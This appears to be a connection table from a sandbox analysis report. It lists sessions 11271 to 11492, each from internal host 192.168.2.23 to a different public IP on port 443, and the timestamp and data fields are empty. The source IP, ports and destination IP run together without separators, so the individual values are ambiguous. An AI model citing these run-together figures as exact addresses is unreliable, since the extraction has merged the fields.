                                                11271192.168.2.235566079.6.181.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11272192.168.2.2347194182.28.213.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11273192.168.2.2336850141.250.248.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11274192.168.2.2343716207.159.33.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11275192.168.2.235103867.249.71.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11276192.168.2.2356048137.52.171.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11277192.168.2.2346326183.183.177.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11278192.168.2.2343750137.158.63.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11279192.168.2.233625267.123.43.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11280192.168.2.233644627.99.54.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11281192.168.2.2344432121.99.99.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11282192.168.2.2348406117.102.3.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11283192.168.2.2351012211.199.168.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11284192.168.2.2360440107.184.157.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11285192.168.2.235631672.75.155.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11286192.168.2.2345944151.10.235.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11287192.168.2.233659840.96.1.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11288192.168.2.233737888.136.133.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11289192.168.2.2353382144.191.16.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11290192.168.2.234652077.231.111.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11291192.168.2.2345310109.18.118.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11292192.168.2.235947695.181.12.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11293192.168.2.2352860183.215.197.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11294192.168.2.2340110158.185.62.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11295192.168.2.2337294143.138.71.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11296192.168.2.235944632.22.208.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11297192.168.2.2355242138.39.12.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11298192.168.2.2349516103.56.142.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11299192.168.2.233557217.126.80.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11300192.168.2.2355378182.111.242.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11301192.168.2.2347252102.126.71.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11302192.168.2.235993876.71.47.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11303192.168.2.2339444114.166.222.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11304192.168.2.2333948213.222.247.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11305192.168.2.234437847.17.152.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11306192.168.2.236070619.173.248.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11307192.168.2.2348504132.13.25.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11308192.168.2.2334712146.205.118.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11309192.168.2.2353292151.168.181.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11310192.168.2.235236434.126.62.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11311192.168.2.2356500153.130.188.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11312192.168.2.2337318194.117.70.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11313192.168.2.2352262124.200.43.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11314192.168.2.2332880196.147.7.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11315192.168.2.2354640173.43.22.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11316192.168.2.2355134150.191.157.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11317192.168.2.235578651.73.171.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11318192.168.2.234806482.154.213.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11319192.168.2.233287071.237.142.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11320192.168.2.234410837.51.19.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11321192.168.2.2357456104.248.7.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11322192.168.2.2339762129.15.209.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11323192.168.2.2355182203.235.231.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11324192.168.2.2338552156.46.196.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11325192.168.2.2348904186.238.210.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11326192.168.2.23452328.84.21.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11327192.168.2.233858220.122.190.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11328192.168.2.2335258147.179.136.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11329192.168.2.235904817.124.150.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11330192.168.2.234126836.144.59.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11331192.168.2.2351218221.34.253.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11332192.168.2.2339068108.157.115.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11333192.168.2.234485879.126.8.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11334192.168.2.2358068165.96.182.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11335192.168.2.2352830160.125.241.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11336192.168.2.235225627.100.86.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11337192.168.2.234394244.44.222.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11338192.168.2.2334814153.236.16.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11339192.168.2.234065214.25.49.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11340192.168.2.234219459.75.242.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11341192.168.2.2343068117.72.59.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11342192.168.2.2336958167.169.228.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11343192.168.2.233396866.215.204.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11344192.168.2.2355558218.251.2.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11345192.168.2.2353814123.193.137.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11346192.168.2.2343202147.205.206.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11347192.168.2.234921482.234.241.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11348192.168.2.2351844178.71.20.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11349192.168.2.23434105.99.116.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11350192.168.2.2348084192.201.44.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11351192.168.2.234411235.223.247.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11352192.168.2.2349250130.194.58.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11353192.168.2.233698472.235.216.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11354192.168.2.2346424147.110.89.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11355192.168.2.234050217.162.204.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11356192.168.2.233820687.148.196.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11357192.168.2.2354260158.191.9.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11358192.168.2.235574413.224.159.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11359192.168.2.234163450.9.135.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11360192.168.2.2343350145.234.73.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11361192.168.2.234626858.74.55.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11362192.168.2.2354284195.86.174.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11363192.168.2.235158031.105.200.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11364192.168.2.2339566109.138.238.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11365192.168.2.2334532162.51.81.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11366192.168.2.2352158161.21.46.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11367192.168.2.235645063.215.139.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11368192.168.2.2336020172.253.138.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11369192.168.2.2350620113.43.147.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11370192.168.2.233761498.229.55.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11371192.168.2.2356734223.221.115.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11372192.168.2.2344592145.9.76.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11373192.168.2.2357144190.156.23.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11374192.168.2.233546495.170.164.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11375192.168.2.235509217.54.108.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11376192.168.2.2341982105.190.220.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11377192.168.2.2343994175.154.6.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11378192.168.2.235954631.58.66.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11379192.168.2.2347556188.29.196.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11380192.168.2.2350208113.80.177.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11381192.168.2.235656691.211.93.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11382192.168.2.233523471.23.68.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11383192.168.2.2357286113.184.84.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11384192.168.2.235563241.9.12.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11385192.168.2.2340646181.114.69.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11386192.168.2.234773876.73.241.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11387192.168.2.2354946212.59.205.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11388192.168.2.234078072.230.4.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11389192.168.2.2351672102.125.142.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11390192.168.2.234097898.216.201.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11391192.168.2.235676820.0.144.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11392192.168.2.2359210125.135.47.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11393192.168.2.234594471.250.96.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11394192.168.2.235744874.238.141.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11395192.168.2.2353896136.157.10.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11396192.168.2.2351410144.115.53.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11397192.168.2.234635685.144.42.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11398192.168.2.2333836140.46.38.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11399192.168.2.2334736209.53.15.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11400192.168.2.2349458135.33.200.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11401192.168.2.233617624.171.224.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11402192.168.2.2335408100.204.27.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11403192.168.2.234681883.164.171.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11404192.168.2.235409454.89.66.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11405192.168.2.233570845.159.204.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11406192.168.2.233292661.16.239.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11407192.168.2.2353902185.223.225.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11408192.168.2.2338776124.89.152.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11409192.168.2.2336120177.34.27.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11410192.168.2.2333874199.46.99.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11411192.168.2.2358918107.155.18.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11412192.168.2.2336988115.252.51.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11413192.168.2.2346408141.206.107.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11414192.168.2.2336040107.44.14.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11415192.168.2.2350828169.196.156.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11416192.168.2.2336652158.221.112.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11417192.168.2.2357826105.56.184.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11418192.168.2.2347206152.234.24.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11419192.168.2.2335436184.237.160.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11420192.168.2.234628291.208.231.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11421192.168.2.233787620.108.181.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11422192.168.2.2350628110.22.40.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11423192.168.2.234632064.27.76.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11424192.168.2.2334824134.44.171.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11425192.168.2.2348640177.232.129.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11426192.168.2.2338388208.235.206.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11427192.168.2.2349092179.166.55.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11428192.168.2.234061834.93.251.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11429192.168.2.236093664.29.151.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11430192.168.2.235544431.175.205.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11431192.168.2.2355480125.103.169.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11432192.168.2.234808220.194.85.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11433192.168.2.2347168133.124.78.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11434192.168.2.233911425.56.173.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11435192.168.2.234876258.205.57.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11436192.168.2.2358480191.34.230.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11437192.168.2.234811666.246.173.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11438192.168.2.2346400197.48.239.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11439192.168.2.2340180158.74.116.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11440192.168.2.2336634158.49.142.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11441192.168.2.233308271.148.85.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11442192.168.2.2350716186.245.93.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11443192.168.2.2354578183.87.61.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11444192.168.2.2349168152.11.114.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11445192.168.2.2336222151.238.102.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11446192.168.2.235293036.49.224.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11447192.168.2.2346388198.200.141.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11448192.168.2.2355776142.150.73.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11449192.168.2.2359662184.254.84.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11450192.168.2.2353436119.57.53.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11451192.168.2.233861493.254.97.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11452192.168.2.2352032175.213.54.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11453192.168.2.234965662.29.144.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11454192.168.2.234311298.9.171.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11455192.168.2.2349520149.133.219.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11456192.168.2.234679220.20.179.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11457192.168.2.2336060168.24.95.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11458192.168.2.233870013.225.77.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11459192.168.2.2359782108.180.118.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11460192.168.2.2360176157.108.3.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11461192.168.2.236096092.139.16.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11462192.168.2.2354816185.38.97.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11463192.168.2.2357082103.172.38.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11464192.168.2.2357390218.204.222.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11465192.168.2.2356682134.9.226.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11466192.168.2.2345932100.237.245.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11467192.168.2.23519028.108.89.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11468192.168.2.235536637.67.63.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11469192.168.2.233454617.246.231.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11470192.168.2.235963242.30.207.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11471192.168.2.2332788151.74.33.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11472192.168.2.2340906161.212.92.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11473192.168.2.2340302141.62.36.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11474192.168.2.234813475.154.228.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11475192.168.2.233808478.249.1.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11476192.168.2.2338282154.151.79.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11477192.168.2.2343470137.60.24.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11478192.168.2.2334120143.1.248.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11479192.168.2.2341576142.30.78.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11480192.168.2.2349398149.178.115.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11481192.168.2.2344858162.79.153.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11482192.168.2.233398846.150.43.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11483192.168.2.2345392194.4.133.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11484192.168.2.2334194210.156.165.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11485192.168.2.235748425.199.192.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11486192.168.2.233482661.25.139.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11487192.168.2.235190641.42.145.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11488192.168.2.235114841.248.55.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11489192.168.2.2345344117.184.185.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11490192.168.2.2350030160.182.107.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11491192.168.2.234813023.201.125.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11492192.168.2.2340648183.81.158.123443
                                                TimestampBytes transferredDirectionData


